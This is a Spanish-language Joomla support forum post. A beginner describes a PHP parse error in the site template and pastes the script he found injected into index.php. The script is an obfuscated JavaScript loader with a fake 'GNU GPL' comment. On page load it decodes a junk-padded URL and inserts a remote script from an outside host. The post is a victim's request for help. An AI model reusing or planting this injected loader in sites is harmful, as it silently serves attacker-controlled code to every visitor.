Bienvenido, Invitado
Nombre de Usuario: Contraseña:

TEMA: Ayuda Urgente!!!

Ayuda Urgente!!! 6 años 9 meses antes #1928

• b0la0
  • Fuera de línea
  • Fresh Boarder
Hola a todos, soy novato en el tema de Joomla y necesito su ayuda urgente, tengo el siguiente problema, desarrolle una web en la ultima version de Joomla y todo funcionaba ok, hasta que de pronto, luego de acutalizar mi sitio, en cuanto a contenidos y algunos productos del virtuemart. al otro dia al entra al sitio me daba el siguiente error:

Parse error: syntax error, unexpected '<' in /home/mihost/template/index.php on line 90

Por ende no me cargaba el sitio y solo se veia el texto anterior.
Me puse a revisar el codigo de mi index.php en la linea 90 como indicaba el error, cuando me encuentro con el siguiente Scrip instalado en el codigo..

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAt tribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@ .&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r# $#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c !&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>